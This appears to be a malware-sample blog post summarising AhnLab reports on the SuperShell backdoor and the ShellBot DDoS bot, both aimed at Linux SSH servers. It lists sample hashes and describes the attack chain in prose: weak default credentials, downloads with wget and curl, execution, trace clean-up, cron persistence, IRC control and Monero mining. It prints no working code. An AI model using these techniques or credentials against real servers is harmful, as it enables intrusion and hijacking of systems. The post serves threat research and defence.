2024-09-12 SUPERSHELL + 2023-03-13 SHELLBOT Targeting Linux SSH servers Samples
2024-09-12 Ahnlab: SuperShell malware targeting Linux SSH servers
- SuperShell is a sophisticated backdoor malware targeting Linux SSH servers, written in the Go language, which allows cross-platform functionality on Linux, Windows, and Android. Created by a Chinese-speaking developer, it operates as a reverse shell, enabling attackers to execute commands remotely on the compromised systems. The attack begins with brute force and dictionary attacks against SSH servers, using weak credentials like "root/password" and "root/123456qwerty." Once access is gained, attackers execute a series of commands to download and install SuperShell, leveraging tools like wget, curl, tftp, and FTP, with download sources often hosted on compromised servers.
- SuperShell's obfuscation adds complexity, but it can still be identified through specific internal strings and its runtime behavior. The malware's installation process is versatile, targeting directories like /tmp, /var/run, /mnt, and /root, with commands often including clean-up actions to remove traces post-installation (rm -r *). Typically, the payload involves downloading a script or binary, which is then executed with elevated permissions using chmod +x followed by execution (./ssh1). This pattern is consistently observed across multiple commands, highlighting the malware's redundancy and persistence in ensuring successful deployment.
- Additionally, the attackers often deploy XMRig, a Monero cryptocurrency miner, alongside SuperShell, hinting at a dual-purpose attack: maintaining persistent control over the system while generating illicit cryptocurrency.
2023-03-13 Ahnlab: ShellBot Malware Being Distributed to Linux SSH Servers
- On March 13, 2023, ASEC reported that ShellBot, a Perl-based DDoS bot, is actively targeting Linux SSH servers. The malware exploits weak SSH credentials through brute-force attacks, gaining access to deploy its payload. Once installed, ShellBot connects to a Command and Control (C&C) server via the IRC protocol, enabling attackers to issue commands, steal data, and launch DDoS attacks.
- Initial Access: Attackers scan for servers with open SSH ports (port 22) and use brute-force tools to guess weak or default credentials.
- Installation: After gaining access, ShellBot is deployed, often achieving persistence by modifying startup scripts or cron jobs.
- IRC Protocol: ShellBot uses the IRC protocol for C&C communication, allowing it to receive commands like executing remote tasks or launching DDoS attacks without needing a custom C&C infrastructure.
- Customization: ShellBot is highly customizable, with variants like "LiGhT’s Modded perlbot v2" offering different capabilities and attack methods tailored by various threat actors.
File Information
- ├── SHELLBOT
- │ ├── 2220783661db230d0808a5750060950688e2618d462ccbe07f54408154c227c1 .pl
- │ ├── b7d62d1a145ddda241e624ef94ab31fcca1a13f79e130d0a704586e35745282a .pl
- │ ├── e476b9c07fcd80824d4eafce0e826ae1c12706ca6215eb6e3995468374bb8a76 .pl
- │ └── f5a26a68344c1ffd136ba73dec9d08f61212872cdba33bd4d7d32733a72e4ed5 .pl
- │ ├── Other Shellbot samples
- │ │ ├── 0857f90be97326ff45f17ec3f6ce60d9a0f6d8faed34e48527fde5ec30bd5a0d
- │ │ ├── 0c1673e442b945a0aecf60d3970e924b16bd72d46e257bd72927821e4ebbc9ca
- │ │ ├── 1f3c279ea684d5cbdc7004819bf15a160f70b2c79c4affd309f9ab3ad957045b
- │ │ ├── 5ba1d0efb313ccc20e3d5f2476a3db811e15c80c3f1ac73b7a02d80c5c49c728
- │ │ ├── a26de5b607e3a66af8b7db2c13bcd1c658817649c699f8731db6f237c3c5b1ce
- │ │ └── cb80570332e3e32037f426e835d05bdcd276e9e5acfd439027d788dd64dcb47d
- └── SUPERSHELL
- ├── 157bea84012ca8b8dc6c0eabf80db1f0256eafccf4047d3e4e90c50ed42e69ff ssh1.sh
- ├── 23dbfb99fc6c4fcfc279100c4b6481a7fd3f0b061b8d915604efa2ba37c8ddfa setup c3pool miner.sh
- └── cf5a7b7c71564a5eef77cc5297b9ffd6cd021eb44c0901ea3957cb2397b43e15 ssh1
- Over the past 15 years, as the blog has been around, many hosting providers have dropped support due to stricter no-malware policies. This has led to broken links, especially in older posts. If you find a broken link on contagiodump.blogspot.com (or contagiominidump.blogspot.com), just note the file name from the URL and search for it in the Contagio Malware Storage.